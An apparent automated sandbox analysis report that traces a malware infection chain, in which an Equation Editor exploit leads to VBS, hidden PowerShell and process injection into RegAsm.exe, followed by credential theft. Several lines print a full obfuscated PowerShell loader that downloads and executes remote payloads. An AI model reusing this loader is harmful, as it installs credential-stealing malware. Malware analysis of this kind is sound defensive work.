              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406A63 CryptUnprotectData,LoadLibraryA,GetProcAddress,CryptUnprotectData,9_2_00406A63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004432B5 mov eax, dword ptr fs:[00000030h]9_2_004432B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10004AB4 mov eax, dword ptr fs:[00000030h]9_2_10004AB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,9_2_00411CFE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434B47 SetUnhandledExceptionFilter,9_2_00434B47
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00434FDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_100060E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10002639
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10002B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,9_2_004180EF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_004120F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419627 mouse_event,9_2_00419627
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjfzlumjvc2vqukvmrvjftmnfllrvu3rsaw5hkclbmswzxssnecctsm9pbicnksggkcdnjysnmjgnkyd1cmwnkycgpscrjybzzzfodhqnkydwjysnczovl3jhdy4nkydnascrj3rodwj1jysncycrj2vyyycrj28nkydujysndgunkydudc5jb20nkycvticrj28nkydezscrj3rlyycrj3rpbicrjy9ob0qnkydljysndgvjde9ul3jlznmvagunkydhzhmvbwfpbi8nkydezxqnkydhaccrj05vjysndggtjysnvi50ehrzzze7jysnigcyjysnoccrj2inkydhc2u2jysnnenvbnqnkydljysnbicrj3qgpscrjyankycotmv3lu9iaicrj2vjdcbtexn0zw0uticrj2unkyd0lldljysnyicrj0nsawvujysndccrjykujysnrccrj293bmxvjysnyscrj2rtjysndhjpbicrj2cozzi4dxjsktsgjysnzzinkyc4ymluyscrj3j5q29udccrj2unkydujysndca9ifttexn0zw0ujysnq29udmvydf06okzyb20nkydcjysnyxnljysnnjqnkydtdccrj3jpbmcozzinkyc4ymfzzty0jysnq28nkydujysndgunkydudcknkyc7iccrj2cyoccrj2fzjysnc2vtymx5iccrjz0nkycgwycrj1jlzicrj2xljysnyycrj3qnkydpb24nkycuqscrj3nzzw1ibhknkyddojpmb2fkjysnkgcyogjpbmfyjysneunvjysnbnqnkydlbnqpoybbzg5sawiusu8usccrj28nkydtzv06olynkydbsscrjyhojysnrgonkyd0ehqurkzsjysnukvxlycrjzankyc1ni8zjysnmtenkycumscrjzuyljmnkyc4jysnlje1ly86jysncccrj3r0jysnaghejysnaiwgaccrj0qnkydqjysnzgunkydzyxrpdicrj2fkjysnb2heaicrjywgaeqnkydqzccrj2vzyxqnkydpjysndmfkjysnb2heaiwgaerqzccrj2unkydzjysnyxqnkydpdmfkjysnb2heaiwnkycgjysnaerquicrj2vnqxntaeqnkydqjysnlcborgporgosjysnaccrj0qnkydqaerqjysnkscplljlcexhq0uoj2heaicsw1n0ukloz11bq0hbcl0znckuumvwtgfdrsgnzzi4jywnjccplljlcexhq0uoj3nnmscsw1n0ukloz11bq0hbcl0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $verbosepreference.tostring()[1,3]+'x'-join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/n'+'o'+'de'+'tec'+'ton'+'/nod'+'e'+'tecton/refs/he'+'ads/main/'+'det'+'ah'+'no'+'th-'+'v.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4cont'+'e'+'n'+'t ='+' '+'(new-obj'+'ect system.n'+'e'+'t.we'+'b'+'clien'+'t'+').'+'d'+'ownlo'+'a'+'ds'+'trin'+'g(g28url); '+'g2'+'8bina'+'rycont'+'e'+'n'+'t = [system.'+'convert]::from'+'b'+'ase'+'64'+'st'+'ring(g2'+'8base64'+'co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'ref'+'le'+'c'+'t'+'ion'+'.a'+'ssembly'+']::load'+'(g28binar'+'yco'+'nt'+'ent); [dnlib.io.h'+'o'+'me]::v'+'ai'+'(h'+'dj'+'txt.ffr'+'rew/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhd'+'j, h'+'d'+'j'+'de'+'sativ'+'ad'+'ohdj'+', hd'+'jd'+'esat'+'i'+'vad'+'ohdj, hdjd'+'e'+'s'+'at'+'ivad'+'ohdj,'+' '+'hdjr'+'egasmhd'+'j'+', hdjhdj,'+'h'+'d'+'jhdj'+')').replace('hdj',[string][char]34).replace('g28','$').replace('sg1',[string][char]39))"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiggjfzlumjvc2vqukvmrvjftmnfllrvu3rsaw5hkclbmswzxssnecctsm9pbicnksggkcdnjysnmjgnkyd1cmwnkycgpscrjybzzzfodhqnkydwjysnczovl3jhdy4nkydnascrj3rodwj1jysncycrj2vyyycrj28nkydujysndgunkydudc5jb20nkycvticrj28nkydezscrj3rlyycrj3rpbicrjy9ob0qnkydljysndgvjde9ul3jlznmvagunkydhzhmvbwfpbi8nkydezxqnkydhaccrj05vjysndggtjysnvi50ehrzzze7jysnigcyjysnoccrj2inkydhc2u2jysnnenvbnqnkydljysnbicrj3qgpscrjyankycotmv3lu9iaicrj2vjdcbtexn0zw0uticrj2unkyd0lldljysnyicrj0nsawvujysndccrjykujysnrccrj293bmxvjysnyscrj2rtjysndhjpbicrj2cozzi4dxjsktsgjysnzzinkyc4ymluyscrj3j5q29udccrj2unkydujysndca9ifttexn0zw0ujysnq29udmvydf06okzyb20nkydcjysnyxnljysnnjqnkydtdccrj3jpbmcozzinkyc4ymfzzty0jysnq28nkydujysndgunkydudcknkyc7iccrj2cyoccrj2fzjysnc2vtymx5iccrjz0nkycgwycrj1jlzicrj2xljysnyycrj3qnkydpb24nkycuqscrj3nzzw1ibhknkyddojpmb2fkjysnkgcyogjpbmfyjysneunvjysnbnqnkydlbnqpoybbzg5sawiusu8usccrj28nkydtzv06olynkydbsscrjyhojysnrgonkyd0ehqurkzsjysnukvxlycrjzankyc1ni8zjysnmtenkycumscrjzuyljmnkyc4jysnlje1ly86jysncccrj3r0jysnaghejysnaiwgaccrj0qnkydqjysnzgunkydzyxrpdicrj2fkjysnb2heaicrjywgaeqnkydqzccrj2vzyxqnkydpjysndmfkjysnb2heaiwgaerqzccrj2unkydzjysnyxqnkydpdmfkjysnb2heaiwnkycgjysnaerquicrj2vnqxntaeqnkydqjysnlcborgporgosjysnaccrj0qnkydqaerqjysnkscplljlcexhq0uoj2heaicsw1n0ukloz11bq0hbcl0znckuumvwtgfdrsgnzzi4jywnjccplljlcexhq0uoj3nnmscsw1n0ukloz11bq0hbcl0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "&( $verbosepreference.tostring()[1,3]+'x'-join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/n'+'o'+'de'+'tec'+'ton'+'/nod'+'e'+'tecton/refs/he'+'ads/main/'+'det'+'ah'+'no'+'th-'+'v.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4cont'+'e'+'n'+'t ='+' '+'(new-obj'+'ect system.n'+'e'+'t.we'+'b'+'clien'+'t'+').'+'d'+'ownlo'+'a'+'ds'+'trin'+'g(g28url); '+'g2'+'8bina'+'rycont'+'e'+'n'+'t = [system.'+'convert]::from'+'b'+'ase'+'64'+'st'+'ring(g2'+'8base64'+'co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'ref'+'le'+'c'+'t'+'ion'+'.a'+'ssembly'+']::load'+'(g28binar'+'yco'+'nt'+'ent); [dnlib.io.h'+'o'+'me]::v'+'ai'+'(h'+'dj'+'txt.ffr'+'rew/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhd'+'j, h'+'d'+'j'+'de'+'sativ'+'ad'+'ohdj'+', hd'+'jd'+'esat'+'i'+'vad'+'ohdj, hdjd'+'e'+'s'+'at'+'ivad'+'ohdj,'+' '+'hdjr'+'egasmhd'+'j'+', hdjhdj,'+'h'+'d'+'jhdj'+')').replace('hdj',[string][char]34).replace('g28','$').replace('sg1',[string][char]39))"Jump to behavior
              Source: RegAsm.exe, 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434C52 cpuid 9_2_00434C52
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00452036
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_004520C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452313
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00448404
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0045243C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_00452543
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,9_2_0040F8D1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,9_2_004488ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,9_2_00451CD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451F50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,9_2_00451F9B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00448957 GetSystemTimeAsFileTime,9_2_00448957
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B60D GetComputerNameExW,GetUserNameW,9_2_0041B60D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
